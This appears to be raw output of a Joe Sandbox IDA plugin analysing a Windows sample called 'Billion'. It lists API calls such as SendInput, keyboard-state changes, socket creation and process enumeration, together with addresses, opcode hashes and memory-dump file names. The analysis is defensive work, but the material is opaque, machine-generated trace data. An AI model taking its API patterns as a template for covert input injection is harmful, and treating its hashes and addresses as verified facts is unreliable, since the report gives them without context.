                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 3601265619-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(?), ref: 001C8576
                                                                                                                                                                                                                                                                                                          • CreateAcceleratorTableW.USER32(00000000,?,?,?,001ABE96,00000000,00000000,?,00000001,00000002), ref: 001C858C
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,001ABE96,00000000,00000000,?,00000001,00000002), ref: 001C8595
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 986409557-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00204038,0020407C), ref: 001C8C1A
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 001C8C2C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                          • String ID: 8@ $|@
                                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-1909839795
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001D0BD4,?), ref: 00190EE0
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001D0BD4,?), ref: 00190EF8
                                                                                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,001CDCE0,000000FF,?,00000000,00000800,00000000,?,001D0BD4,?), ref: 00190F1D
                                                                                                                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 00190F3E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 001BB10C
                                                                                                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 001BB11A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 001BB1FC
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BB20B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00174D73,?), ref: 0014E395
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 001B255A
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B2568
                                                                                                                                                                                                                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001B25E7
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B25F1
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001C6D1A
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001C6D4D
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001C6DBA
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c422b0870012080241a1d7453d653078ead71b3e2448ca1bc9de506ca5617f33
                                                                                                                                                                                                                                                                                                          • Instruction ID: 242c707575bf00d48fd200b06c5efcfe2b36cc7d17ca33930ed6bbb69ffa5c7e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c422b0870012080241a1d7453d653078ead71b3e2448ca1bc9de506ca5617f33
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3151FB74A00209EFCF24DFA4D884EAE7BB6EB64320F20856EE95597291D730ED81CB50
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: dadcc85492ab069e0bf38bd4140f5300fad89b8b5193b8173417b7f18e0f340f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 312b44556a5dce0681675ece71f8ee6cb924c064ef7f7b2a2750998a106e0234
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dadcc85492ab069e0bf38bd4140f5300fad89b8b5193b8173417b7f18e0f340f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7841F671A04704AFD725AF78CC81BAABBEDEB98710F10853EF115DB291D77199A28780
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001A61C8
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 001A61EE
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001A6213
                                                                                                                                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001A623F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 69e8883a57abf42b3beece19fbecf2c64d5602902f320db39a2032ee45e86e08
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5c9ce0f11bc1ad3dc4f2e46fd68f7343c0fd4dae51affa066b07402d1484f1d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69e8883a57abf42b3beece19fbecf2c64d5602902f320db39a2032ee45e86e08
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA412639600610DFCF11EF65C585A1ABBF2EF99714F198498E84AAB362CB34FD41CB91
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0019B473
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0019B48F
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0019B4FD
                                                                                                                                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0019B54F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 931e83d1fc6907e13d424eb629f39c9798fbef893289dddc076f0ec4910ec379
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5ddaed4c62ddd79a9c7f7340444c026e5e6079c695f839582c8bbd086630351
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 931e83d1fc6907e13d424eb629f39c9798fbef893289dddc076f0ec4910ec379
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59316870A082186EFF34CB25A989BFE7BB5BF58310F04421AF096971D2C374D98597A1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0019B5B8
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0019B5D4
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0019B63B
                                                                                                                                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0019B68D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4321ec55f89f0ab2811f986a8c7f8407b08bb5c0d9755955efe2c18576249049
                                                                                                                                                                                                                                                                                                          • Instruction ID: 18a51c361664a11e69dd94400f32a992d90d13f76d1c07dbb2adf557274965a7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4321ec55f89f0ab2811f986a8c7f8407b08bb5c0d9755955efe2c18576249049
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29316E30948618AEFF348B25E945BFE7BB6EF95310F04422EE081821D1C374EA85CB91
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 001C80D4
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001C814A
                                                                                                                                                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 001C815A
                                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 001C81C6
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7716219ea44ad7db150c8ae826347e6bbe56003f94473285f98e6cbdf2fcd67a
                                                                                                                                                                                                                                                                                                          • Instruction ID: d14b73b1e84fe6e9f360d1529ea1cb00a753057be4406d39173fa2dac98f0a2b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7716219ea44ad7db150c8ae826347e6bbe56003f94473285f98e6cbdf2fcd67a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8418B30A00259DFCB15CF58D8C8FA9BBF5FB69314F1841ADE9549B261CB30E886CB90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001C2187
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001943AD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetCurrentThreadId.KERNEL32 ref: 001943B4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00192F00), ref: 001943BB
                                                                                                                                                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 001C219B
                                                                                                                                                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 001C21E8
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001C21EE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d6cc900c3874cbebd2e6dc0f5a8ca164e473b662a57104b7b0a127c52c26ba1a
                                                                                                                                                                                                                                                                                                          • Instruction ID: fadec49eb763d2d6e8df6d507d82699d89b8a89ed4e8eaa2dd1245cd024ee127
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6cc900c3874cbebd2e6dc0f5a8ca164e473b662a57104b7b0a127c52c26ba1a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B3152B5D00209AFDB04EFA5C881DAEBBF8EF58304B54446AE415E7251DB71DE45CBA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019E8E2
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019E8F9
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019E924
                                                                                                                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0019E92F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: dc0d635488dce34831680cf3e20a9e327c78f640b2b29e0cb3da15dc90f2937d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7ce46d638569baaedf01dbe49665afc6ef39563fc00b1dc6123a4a05332ad660
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc0d635488dce34831680cf3e20a9e327c78f640b2b29e0cb3da15dc90f2937d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B21A171900614EFCF11EFA8D982BAEB7F8EF55355F144064E814BF241D770AE418BA1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001C32A6
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001C32C0
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001C32CE
                                                                                                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001C32DC
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 735851ad2af30ba61ad132ccf8654658d77e41cb76b2644933c09e8e45b413b7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9359de047dd6d073dca6a2c28842e81c2533f199895b33834dfe2cee02bc80c9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735851ad2af30ba61ad132ccf8654658d77e41cb76b2644933c09e8e45b413b7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E21D631204611AFDB149B24D845F6ABB95EFA1318F24C25CF8368B6D2C771ED81CBD0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001996E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00198271,?,000000FF,?,001990BB,00000000,?,0000001C,?,?), ref: 001996F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001996E4: lstrcpyW.KERNEL32(00000000,?,?,00198271,?,000000FF,?,001990BB,00000000,?,0000001C,?,?,00000000), ref: 00199719
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001996E4: lstrcmpiW.KERNEL32(00000000,?,00198271,?,000000FF,?,001990BB,00000000,?,0000001C,?,?), ref: 0019974A
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001990BB,00000000,?,0000001C,?,?,00000000), ref: 0019828A
                                                                                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,001990BB,00000000,?,0000001C,?,?,00000000), ref: 001982B0
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,001990BB,00000000,?,0000001C,?,?,00000000), ref: 001982EB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                          • String ID: cdecl
                                                                                                                                                                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5b3b9302554ba7a051f5846fea0a00c26c1e5c0681892ea1fb2b62317ca82e9e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 01ec1d5c800e741ac4a17f391cb547543552bbfb4ddf24fd30112c2e95c2f566
